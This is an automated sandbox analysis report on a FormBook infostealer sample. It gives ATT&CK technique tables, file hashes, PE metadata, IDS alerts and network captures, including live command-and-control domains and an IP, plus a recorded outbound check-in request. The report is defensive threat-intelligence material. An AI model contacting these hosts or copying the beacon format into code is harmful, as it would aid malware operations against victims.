Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	512 Process Injection	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Deobfuscate/Decode Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Hidden Files and Directories	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Abuse Elevation Control Mechanism	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	4 Obfuscated Files or Information	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	22 Software Packing	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 DLL Side-Loading	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
0Z2lZiPk5K.exe	47%	ReversingLabs	Win32.Backdoor.FormBook
0Z2lZiPk5K.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
https://api.solubility.com/?substance=	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.mosquitoxp.lol	127.0.0.1	true	false	unknown
zcdn.8383dns.com	134.122.133.80	true	true	unknown
www.clubhoodies.shop	unknown	unknown	false	unknown
www.jrcov55qgcxp5fwa.top	unknown	unknown	false	unknown
www.1337street.shop	unknown	unknown	false	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	RmClient.exe, 00000007.00000002.2929901223.00000000075EE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersG	0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	RmClient.exe, 00000007.00000002.2929901223.00000000075EE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/?	0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers?	0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.solubility.com/?substance=	0Z2lZiPk5K.exe	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	RmClient.exe, 00000007.00000002.2929901223.00000000075EE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.tiro.com	0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	RmClient.exe, 00000007.00000002.2929901223.00000000075EE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers	0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	RmClient.exe, 00000007.00000002.2929901223.00000000075EE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.carterandcone.coml	0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sajatypeworks.com	0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.typography.netD	0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	RmClient.exe, 00000007.00000002.2929901223.00000000075EE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/staff/dennis.htm	0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/frere-user.html	0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	RmClient.exe, 00000007.00000002.2929901223.00000000075EE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/DPlease	0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers8	0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.urwpp.deDPlease	0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.zhongyicts.com.cn	0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	RmClient.exe, 00000007.00000002.2929901223.00000000075EE000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
134.122.133.80	zcdn.8383dns.com	United States		64050	BCPL-SGBGPNETGlobalASNSG	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1586023
Start date and time:	2025-01-08 16:20:38 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	0Z2lZiPk5K.exe renamed because original name is a hash value
Original Sample Name:	fcdefe2bc868f4c16ed735bd0200b3fc71a485ec9b08681463ed0618f209944e.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/2@4/2
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 93% Number of executed functions: 100 Number of non-executed functions: 188
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.56.254.164, 4.175.87.197, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target ONQMbShhwr.exe, PID 3168 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
VT rate limit hit for: 0Z2lZiPk5K.exe

Simulations

Behavior and APIs

Time	Type	Description
10:22:03	API Interceptor	47x Sleep call for process: 0Z2lZiPk5K.exe modified
10:23:24	API Interceptor	7x Sleep call for process: RmClient.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
134.122.133.80	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	www.jrcov55qgcxp5fwa.top/jpjz/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
zcdn.8383dns.com	DHL DOCS 2-0106-25.exe	Get hash	malicious	FormBook	Browse	134.122.135.48
	PO_62401394_MITech_20250601.exe	Get hash	malicious	FormBook	Browse	134.122.135.48
	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	134.122.135.48
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	134.122.133.80
	inv#12180.exe	Get hash	malicious	FormBook	Browse	154.21.203.24

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
BCPL-SGBGPNETGlobalASNSG	DHL DOCS 2-0106-25.exe	Get hash	malicious	FormBook	Browse	134.122.135.48
	PO_62401394_MITech_20250601.exe	Get hash	malicious	FormBook	Browse	134.122.135.48
	ErbgterT2R.exe	Get hash	malicious	GhostRat	Browse	134.122.155.39
	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	134.122.135.48
	Uulw5M1DfU.exe	Get hash	malicious	GhostRat	Browse	137.220.229.61
	HGwpjJUqhW.exe	Get hash	malicious	GhostRat	Browse	118.107.44.219
	vYeaC4s9zP.exe	Get hash	malicious	GhostRat	Browse	27.124.4.60
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	134.122.133.80
	BrSgiTp1iH.exe	Get hash	malicious	GhostRat	Browse	134.122.135.95
	http://smbc.usobd.com	Get hash	malicious	Unknown	Browse	134.122.128.92

Process:	C:\Users\user\Desktop\0Z2lZiPk5K.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLU84qpE4KlKDE4KhKiKhIE4Kx1qE4qXKIE4oKNzKoZAE4Kze0E4j:Mgv2HKlYHKh3oIHKx1qHitHo6hAHKzea
MD5:	FB53815DEEC334028DBDE4E3660E26D0
SHA1:	7F491359EC244406DFC8AA39FC9B727D677E4FDF
SHA-256:	C3EC8D6C079B1940D82374A85E9DC41ED9FF683ADA338F89E375AA7AC777749D
SHA-512:	5CC466901D7911BE1E1731162CC01C371444AAFA9A504F1F22516F60C888048EB78B5C5A12215EE2B127BD67A19677E370686465E85E08BC14015F8FAB049E49
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Temp\40182GJpK

Download File

Process:	C:\Windows\SysWOW64\RmClient.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.820070910578987
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	0Z2lZiPk5K.exe
File size:	904'704 bytes
MD5:	e4755754426a643cc7210791a682d80b
SHA1:	79a1b7d1d916b31306d533b9ef8be943327ff791
SHA256:	fcdefe2bc868f4c16ed735bd0200b3fc71a485ec9b08681463ed0618f209944e
SHA512:	89899a41ad49a6fb4643c8d2253c5e052eca02ceca8c97ac88bf78d14b29c68ef1681fd534303b303ff4bb3bb745eac9a6ca4cfb12be21afc6a3d6fcc65a5bed
SSDEEP:	12288:vIFof87k7xOXcg0ADT2JKhY+Smgw1HuWObsIcDazNdi/Q0f/n:w+dOMg00EKK+SmpHHauJnf
TLSH:	6015F10A6BE94A48F9FF7F31697115504671B827A932F3AE12C021FE8E31F958950B73
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,..]................................. ........@.. .......................@............`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4de4ae
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5DC9042C [Mon Nov 11 06:48:12 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xde460	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xe0000	0x3fc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xe2000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xdc4b4	0xdc600	c40ab3d4a3d9bf73ac15d26fb58e4eb7	False	0.714289829126489	data	6.826884286951344	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xe0000	0x3fc	0x400	b5f98780ef967a3aca686c9cefce464e	False	0.4365234375	data	3.4940984831864417	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xe2000	0xc	0x200	48df212ef06744dde257e3f756c093b4	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xe0058	0x3a4	data			0.44635193133047213

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-08T16:23:21.303236+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	50008	134.122.133.80	80	TCP
2025-01-08T16:23:21.303236+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50008	134.122.133.80	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 16:23:20.422900915 CET	50008	80	192.168.2.4	134.122.133.80
Jan 8, 2025 16:23:20.427753925 CET	80	50008	134.122.133.80	192.168.2.4
Jan 8, 2025 16:23:20.428538084 CET	50008	80	192.168.2.4	134.122.133.80
Jan 8, 2025 16:23:20.439516068 CET	50008	80	192.168.2.4	134.122.133.80
Jan 8, 2025 16:23:20.444343090 CET	80	50008	134.122.133.80	192.168.2.4
Jan 8, 2025 16:23:21.303071022 CET	80	50008	134.122.133.80	192.168.2.4
Jan 8, 2025 16:23:21.303143024 CET	80	50008	134.122.133.80	192.168.2.4
Jan 8, 2025 16:23:21.303236008 CET	50008	80	192.168.2.4	134.122.133.80
Jan 8, 2025 16:23:21.307074070 CET	50008	80	192.168.2.4	134.122.133.80
Jan 8, 2025 16:23:21.311885118 CET	80	50008	134.122.133.80	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 16:23:02.412210941 CET	52188	53	192.168.2.4	1.1.1.1
Jan 8, 2025 16:23:02.421447039 CET	53	52188	1.1.1.1	192.168.2.4
Jan 8, 2025 16:23:07.471709967 CET	63626	53	192.168.2.4	1.1.1.1
Jan 8, 2025 16:23:07.605278969 CET	53	63626	1.1.1.1	192.168.2.4
Jan 8, 2025 16:23:14.676350117 CET	55104	53	192.168.2.4	1.1.1.1
Jan 8, 2025 16:23:14.685319901 CET	53	55104	1.1.1.1	192.168.2.4
Jan 8, 2025 16:23:19.705892086 CET	62443	53	192.168.2.4	1.1.1.1
Jan 8, 2025 16:23:20.418713093 CET	53	62443	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 8, 2025 16:23:02.412210941 CET	192.168.2.4	1.1.1.1	0x36b1	Standard query (0)	www.1337street.shop	A (IP address)	IN (0x0001)	false
Jan 8, 2025 16:23:07.471709967 CET	192.168.2.4	1.1.1.1	0xce2a	Standard query (0)	www.mosquitoxp.lol	A (IP address)	IN (0x0001)	false
Jan 8, 2025 16:23:14.676350117 CET	192.168.2.4	1.1.1.1	0x2a7c	Standard query (0)	www.clubhoodies.shop	A (IP address)	IN (0x0001)	false
Jan 8, 2025 16:23:19.705892086 CET	192.168.2.4	1.1.1.1	0xcfd2	Standard query (0)	www.jrcov55qgcxp5fwa.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 8, 2025 16:23:02.421447039 CET	1.1.1.1	192.168.2.4	0x36b1	Name error (3)	www.1337street.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 8, 2025 16:23:07.605278969 CET	1.1.1.1	192.168.2.4	0xce2a	No error (0)	www.mosquitoxp.lol		127.0.0.1	A (IP address)	IN (0x0001)	false
Jan 8, 2025 16:23:14.685319901 CET	1.1.1.1	192.168.2.4	0x2a7c	Name error (3)	www.clubhoodies.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 8, 2025 16:23:20.418713093 CET	1.1.1.1	192.168.2.4	0xcfd2	No error (0)	www.jrcov55qgcxp5fwa.top	zcdn.8383dns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 8, 2025 16:23:20.418713093 CET	1.1.1.1	192.168.2.4	0xcfd2	No error (0)	zcdn.8383dns.com		134.122.133.80	A (IP address)	IN (0x0001)	false
Jan 8, 2025 16:23:20.418713093 CET	1.1.1.1	192.168.2.4	0xcfd2	No error (0)	zcdn.8383dns.com		134.122.135.48	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.jrcov55qgcxp5fwa.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	50008	134.122.133.80	80	2108	C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 16:23:20.439516068 CET	569	OUT	GET /ah2l/?Ud=0XIysXmjicdWgm2Fao/GzBVFV7BHxJICrB9qe1pxW9F6KmTtpKViQSnjO8JFZFRtQOT2SKyqDZIyiHstHNrb6XHUFKDI8ax1U9tOs3GxgCtVp10eokz4wwo=&ZjQ=-JvPDv0h-Nt8C HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.jrcov55qgcxp5fwa.top Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
Jan 8, 2025 16:23:21.303071022 CET	708	IN	HTTP/1.1 404 Not Found Content-Length: 548 Content-Type: text/html Date: Wed, 08 Jan 2025 15:23:21 GMT Server: nginx X-Cache: BYPASS Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Target ID:	0
Start time:	10:21:29
Start date:	08/01/2025
Path:	C:\Users\user\Desktop\0Z2lZiPk5K.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\0Z2lZiPk5K.exe"
Imagebase:	0x590000
File size:	904'704 bytes
MD5 hash:	E4755754426A643CC7210791A682D80B
Has elevated privileges:	true
Has administrator privileges:	true
